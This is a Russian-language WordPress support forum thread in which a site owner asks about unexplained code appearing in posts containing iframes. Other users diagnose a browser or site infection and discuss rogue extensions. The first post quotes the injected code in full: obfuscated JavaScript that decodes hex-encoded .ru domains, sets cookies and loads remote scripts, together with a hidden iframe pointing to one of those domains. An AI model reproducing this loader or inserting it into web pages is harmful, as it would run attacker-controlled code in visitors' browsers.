Поддержка Проблемы и решения Непонятный код в записях

  • С недавнего времени при открытии моих сайтов браузере Хром стало появляться странное сообщение.
    См. скриншот
    Попытки отключить этот плагин в настройках браузера ни к чему не приводят. Казалось бы это можно было бы списать на причуды Хрома и забить на этот вопрос. Но интересно то, в записях моих сайтов, точнее только в тех записях, где вставлен какой-либо объект iframe появляется такой код:

    <script>// < ![CDATA[
    // < ![CDATA[
    // < ![CDATA[
    // < ![CDATA[
    window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21740",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("l-konstantin.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
    // ]]></script><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html" width="300" height="150"></iframe>
    
    <script>// < ![CDATA[
    // < ![CDATA[
    // < ![CDATA[

    После удаления кода он сам по себе появляется вновь после сохранения или публикации записи и виден только при просмотре черновика записи в текстовом режиме. Что это всё значит?

Просмотр 15 ответов — с 1 по 15 (всего 30)
  • а iframe вы сами вставляете?
    вполне возможно, что сайт заражен вирусами.

    а iframe вы сами вставляете?

    Только что писал новую статью и вставил код карты яндекса. Вот тут я эту хрень и заметил. Её удаляешь — она снова появляется после сохранения записи. Удалил код карт и всё ок. Хрень больше не появляется.

    Но Хром все равно выдает предупреждение об этом плагине. Значит буду просматривать другие записи — где то еще есть iframe…..

    Другие браузеры молчат.

    https://support.google.com/chrome/answer/6213033 вот что пишет Хром про этот плагин. Но что провоцирует его работу на моих сайтах? Неужели любой код iframe?

    вы не в ту сторону копаете.
    надо думать не о том, почему хром отключил непонятный плагин, а о том, что такое подозрительное выводится в этом ифрейме, что требует запуска левого плагина в хроме.

    карты яндекса — это js-скрипт, не должен для него запускаться никакой левый плагин для браузера.

    Модератор Sergey Biryukov

    (@sergeybiryukov)

    Live and Learn

    Эта строка явно выглядит подозрительно и с картами никак не связана:

    src="https://al9l235gkc7d.ru/f.html"

    Я в ступоре. В Хром неизвестно откуда установилось какое то левое расширение, которое стало постоянно открывать в новом окне игровой сайт сайт казино «вулкан» или что то типа того.. Удалил это расширение, к сожалению даже не запомнив его название. После этого странный код при редактировании записей перестал появляться. Но это уведомление все равно появляется и только в Хроме. Ничего не могу понять…

    неизвестно откуда ничего не устанавливается 🙂
    научитесь снимать галочки при установке программ и не качайте варезные программы 🙂

    научитесь снимать галочки при установке программ и не качайте варезные программы 🙂

    Уж тут мне советовать н надо. Сам кого хочешь этому научу. Что касается софта — на моих компах как дома так и на работе — только лицензионный софт. В том числе фотошот, фотошоп латйтрум, офис, видеомонтажная программа. Могу себе это позволить )))

    P.S. Вместе с непонятным расширением (не знаю связано это или нет) перестал автозапускаться касперский 2016. После его переустановки он заработал. Впрочем все это к WP отношения уже не имеет.

    я вам не верю.
    сами по себе вирусы не устанавливаются.
    причем такие, что даже KIS вырубают.

    и про лицензии я вам опять же не верю — фотошоп стоит 15 тысяч, неужели купили?

    Модератор Yui

    (@fierevere)

    ゆい

    расширения поддельные не только нагло подстраиваются под что-то
    но даже и ID ухитряются подделывать, на Хабре Яндекс достаточно интересные тезисы набросали, правда для своего браузера, но он по сути 1 шаг от хрома..

    Самовольно впрочем тоже ставятся иногда, как в Хроме, так и даже в ФФ (чем я вообще сильно возмущена, прилетело расширение с инструментами андроид, бинарники (!) скомпилированы под убунтой, при этом один нагло запускается как сервис)

    «казино вулкан» открывается в любом браузере и без расширений,
    видимо часто ходите по сайтам типа рутора

    al9l235gkc7d.ru + отключение Касперского = явная симптоматика заражения, лечите ) Сами знаете наверное чем
    CureIt, Avz и иже с ними 😀

    PS: «странное сообщение» из за регистрации расширения в хроме,
    надо чистить «реестр» хрома , в ФФ можно было бы порыться в about:config , в хроме не знаю

    Самовольно впрочем тоже ставятся иногда

    ну как самовольно то?
    тот же KIS к примеру или драйвера логитековские — свои расширения пихают в браузеры при своей же установке. галок снять — нет. но установку этих программ ты запускаешь сам.

    всякая муть в браузеры ставится при установке всяких левых программ — причем не обязательно варезных, такую хрень можно подцепить при установке самых обыкновенных и невредоносных фриварок.

    весь вопрос в том, чтобы контролировать что и откуда ты ставишь. у меня есть папочка «дистрибутивы», пополняется она пару раз в год новыми программами. после установки системы я ставлю программы из этой папки — и больше ничего.

    Модератор Yui

    (@fierevere)

    ゆい

    мне в линуксе прилетели 2 расширения на ФФ, который я собираю сама из проверенных официальных исходников и одно в Хром (официальная сборка для дебиан)

    никаких сторонних «подсовываний» браузер сам затянул аддоны

    не помню что там было в Хроме, какая-то поисковая фигня вроде
    ФФ затянул
    1. ADB Helper
    2. Valence

    первый запускает сервисом

    adb -P 5037 fork-server server

    ~/.mozilla/firefox/bq3vhpqx.default/extensions/adbhelper@mozilla.org/linux $ file adb
    adb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.8, stripped

    так что вот такие дела…
    да, они официальные чистые расширения, от разработчиков браузера
    но сам факт что это все поставилось без спросу и без моего явного на то согласия уже напрягает

    может собрали криво не с теми флагами?
    на официальном виндовом FireFox я ни разу не видел, чтобы устанавливалось что-то левое.

    сейчас вот проверил — из отключенного 4 расширения KIS и 1 логитековское.

    Модератор Yui

    (@fierevere)

    ゆい

    флаги тут непричем, просто теперь не удосуживаются даже спрашивать перед установкой расширений.
    причем держат явно пользователей за идиотов

    [I] dev-util/android-tools
         Available versions:  0_p20130218 (~)5.1.1_p13{tbz2}
         Installed versions:  5.1.1_p13{tbz2}(18:52:26 09/16/15)
         Homepage:            https://android.googlesource.com/platform/system/core.git/
         Description:         Android platform tools (adb, fastboot, and mkbootimg)

    зачем ставить то, что уже установлено?

    на официальном виндовом FireFox я ни разу не видел, чтобы устанавливалось что-то левое.

    Разработка — WebIDE , просто запустите и закройте, ФФ без спроса поставит 2 расширения и запустит фоновый сервис ADB

    я хз зачем оно становится втихую, но смысл то вообще в другом.
    само по себе может установится только официальное, что не вошло в сам движок. без действий со стороны пользователя сторонние расширения установится не могут.

Просмотр 15 ответов — с 1 по 15 (всего 30)
  • Тема «Непонятный код в записях» закрыта для новых ответов.